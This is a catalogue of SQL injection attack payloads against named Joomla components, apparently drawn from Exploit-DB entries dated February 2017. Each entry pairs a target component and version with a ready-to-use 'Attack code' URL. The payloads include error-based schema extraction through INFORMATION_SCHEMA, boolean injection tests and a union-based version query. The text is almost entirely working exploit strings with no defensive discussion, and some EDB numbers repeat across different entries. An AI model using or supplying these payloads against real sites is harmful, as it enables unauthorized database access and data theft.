Attack code: /?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
Target program: Joomla | Target environment: Joomla! Component GPS Tools 4.0.1
2017-02-24 | EDB 41452 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Community Quiz 4.3.5 - / SQL Injection vulnerability
Attack code: /?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1&view=quizzes
Target program: Joomla | Target environment: Joomla! Component Community Quiz 4.3.5
2017-02-24 | EDB 41444 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JooDatabase 3.1.0 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=1%20and%201=1--&searchfield=Ihsan_Sencan
Target program: Joomla | Target environment: Joomla! Component JooDatabase 3.1.0
2017-02-24 | EDB 41445 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JO Facebook Gallery 4.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_jofacebookgallery&view=category&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JO Facebook Gallery 4.5
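2017-02-24 | EDB 41446 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component AJAX Search for K2 2.2 - / SQL Injection vulnerability
Attack code: /?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component AJAX Search for K2 2.2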
2017-02-24 | EDB 41447 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Community Surveys 4.3 - / SQL Injection vulnerability
Attack code: /?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
Target program: Joomla | Target environment: Joomla! Component Community Surveys 4.3
2017-02-24 | EDB 41448 | SQL Injection | Difficulty: Hard | Severity: High
Name: Joomla! Component Community Polls 4.5.0 - SQL Injection
Attack code: /?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
Target program: Joomla | Target environment: Joomla! Component Community Polls 4.5.0
2017-02-25 | EDB 41456 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Intranet Attendance Track 2.6.5 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_intranet&view=calendar&month=3&year=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Intranet Attendance Track 2.6.5
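2017-02-25 | EDB 41460 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Gnosis 1.1.2 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_gnosis&view=tags&id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Gnosis 1.1.2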
2017-02-25 | EDB 41462 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Appointments for JomSocial 3.8.1 - /my-appointments/ SQL Injection vulnerability
Attack code: /my-appointments/viewappointment?id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Appointments for JomSocial 3.8.1
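2017-02-25 | EDB 41465 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JomSocial - /groups/ SQL Injection vulnerability
Attack code: /groups/?IhsanSencan=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JomSocial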
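2017-02-25 | EDB 41465 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JomSocial - /videos/ SQL Injection vulnerability
Attack code: /videos/?IhsanSencan=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JomSocial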
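2017-02-25 | EDB 41465 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component JomSocial - /events/ SQL Injection vulnerability
Attack code: /events/?IhsanSencan=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component JomSocial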
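2017-02-25 | EDB 41464 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Spinner 360 1.3. - / SQL Injection vulnerability
Attack code: /spinner-360?Ihsan_Sencan=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Spinner 360 1.3.0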
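2017-02-25 | EDB 41463 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component My MSG 3.2.1 - index.php SQL Injection vulnerability
Attack code: /index.php?option=com_mymsg&layout=edit&reply_id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component My MSG 3.2.1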
2017-02-25 | EDB 41462 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component Appointments for JomSocial 3.8.1 - /my-appointments/my-appointments/ SQL Injection vulnerability
Attack code: /my-appointments/my-appointments/edit?id=1%20and%201=1--
Target program: Joomla | Target environment: Joomla! Component Appointments for JomSocial 3.8.1
2017-02-27 | EDB 41470 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Joomla! Component OneVote! 1.0 - results.php SQL Injection vulnerability
Attack code: /components/com_onevote/results.php?election_id=+/*!50000union*/+select+@@version-- -
Target program: Joomla | Target environment: Joomla! Component OneVote! 1.0